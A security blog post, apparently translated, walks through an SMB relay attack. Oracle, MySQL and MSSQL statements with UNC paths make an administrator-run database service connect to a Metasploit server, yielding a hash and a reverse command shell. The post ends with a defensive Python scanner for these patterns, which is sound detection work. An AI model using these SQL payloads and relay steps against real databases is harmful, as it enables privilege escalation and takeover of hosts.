Recently I came across an interesting document called "Penetration: from application down to OS (Oracle)". Its main point is that if the Oracle service is started under an administrator account, a database account with nothing more than the CONNECT and RESOURCE privileges can use Metasploit's SMB relay module to set up a local SMB spoofing server and gain access to the operating system. I ran a local test and it really works. :-)
For the detailed analysis of the underlying principle, read the original document; here I just write up my own test process.
My test environment: Ubuntu 8.10 + Metasploit 3.3 dev, Oracle database version 10.2.0.1.0 with the service running under an administrator account, and a database account with the default privileges of the DBSNMP account.
1. First use the netstat command to check that local port 139 is not in use. The service that usually occupies this port is Samba, so shut it down; on Ubuntu: sudo /etc/init.d/samba stop
2. Run Metasploit. I chose shell_reverse_tcp as the PAYLOAD, did the corresponding configuration, and ran exploit. With netstat you can see that the local host is now listening on ports 139 and 8522.
3. Now connect to the Oracle database with the default DBSNMP account. Its default privileges are relatively low: only CONNECT and RESOURCE.
4. Then execute the following three SQL statements:
SQL> CREATE TABLE files (id NUMBER PRIMARY KEY, path VARCHAR(255) UNIQUE, ot_format VARCHAR(6));
SQL> INSERT INTO files VALUES (1, '\\192.168.1.52\mickey', NULL);
SQL> CREATE INDEX file_index ON files (path) INDEXTYPE IS ctxsys.context PARAMETERS ('datastore ctxsys.file_datastore format column ot_format');
As soon as the CREATE INDEX statement completes, look at the local Metasploit session: we have already captured the LM half-hash and obtained a command shell as the current service user on the Oracle database host.
Later, following a tip from pt007, I tested MySQL: if that service is also started by an administrator, SELECT LOAD_FILE('\\\\192.168.1.52\mk.txt') also gets system privileges. For MSSQL the xp_dirtree stored procedure should work as well, but I did not configure MSSQL to start under an administrator account, so I would appreciate pointers from anyone who knows.
This technique can be used in intranet web assessments: if there is an injection and the service is started by an administrator, you can escalate privileges.
Two PDF downloads,
Author: Mickey
http://dsecrg.com/files/pub/pdf/Penetration_from_application_down_to_OS_(oracle%20database).pdf
http://54mickey.googlepages.com/Penetration_fromapplication_down_to_.pdf
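As an added defender-side example (not from the post or from the PDFs above), here is a small Python scanner that flags the three statement patterns described above in a sequence of SQL statements, such as a database audit trail: an Oracle Text FILE_DATASTORE index created after a UNC path was stored in the session, MySQL LOAD_FILE() on a UNC path, and MSSQL xp_dirtree on a UNC path. The regexes, the severity levels and the sample statements are my own constructions.

```python
import re
from typing import Dict, List, Optional

# UNC path literal: two backslashes, a host, a backslash, then a share/file name.
UNC_PATH = re.compile(r"""\\\\[A-Za-z0-9.\-]+\\[^\s'"]+""")
# Oracle Text CONTEXT index whose datastore opens the files named in the column.
ORACLE_FILE_DATASTORE = re.compile(
    r"CREATE\s+INDEX.*?INDEXTYPE\s+IS\s+CTXSYS\.CONTEXT.*?FILE_DATASTORE",
    re.IGNORECASE | re.DOTALL,
)
# File-reading primitives that take a quoted path argument (MySQL / MSSQL).
PATH_PRIMITIVES = {
    "mysql_load_file": re.compile(r"LOAD_FILE\s*\(\s*'([^']*)'", re.IGNORECASE),
    "mssql_xp_dirtree": re.compile(r"xp_dirtree\s+'([^']*)'", re.IGNORECASE),
}


def unc_host(text: str) -> Optional[str]:
    """Host part of the first UNC path in text, or None."""
    m = UNC_PATH.search(text)
    return m.group(0).split("\\")[2] if m else None


def scan_sql(statements: List[str]) -> List[Dict[str, object]]:
    """One finding per suspicious statement, in session order.
    Severity: bare UNC literal "low" (may be data); LOAD_FILE/xp_dirtree on a UNC
    path "high"; Oracle FILE_DATASTORE index "high" if an earlier statement in the
    session stored a UNC literal, else "medium" (local-file indexes are legitimate)."""
    findings: List[Dict[str, object]] = []
    unc_seen_earlier = False
    for n, stmt in enumerate(statements, start=1):
        host = unc_host(stmt)
        reasons: List[str] = []
        severity = None
        for name, rx in PATH_PRIMITIVES.items():
            m = rx.search(stmt)
            if m and UNC_PATH.search(m.group(1)):
                reasons.append(name)
                severity = "high"
        if ORACLE_FILE_DATASTORE.search(stmt):
            reasons.append("oracle_file_datastore_index")
            severity = "high" if unc_seen_earlier else "medium"
        if host and not reasons:  # a UNC literal with no primitive: note it, keep watching
            reasons.append("unc_path_literal")
            severity = "low"
        unc_seen_earlier = unc_seen_earlier or host is not None
        if reasons:
            findings.append({"line": n, "severity": severity, "reasons": reasons, "host": host})
    return findings
```

Feed it the statements of one database session in order; the "host" field gives the address the database server would try to reach over SMB, which is what to look for in outbound connection logs.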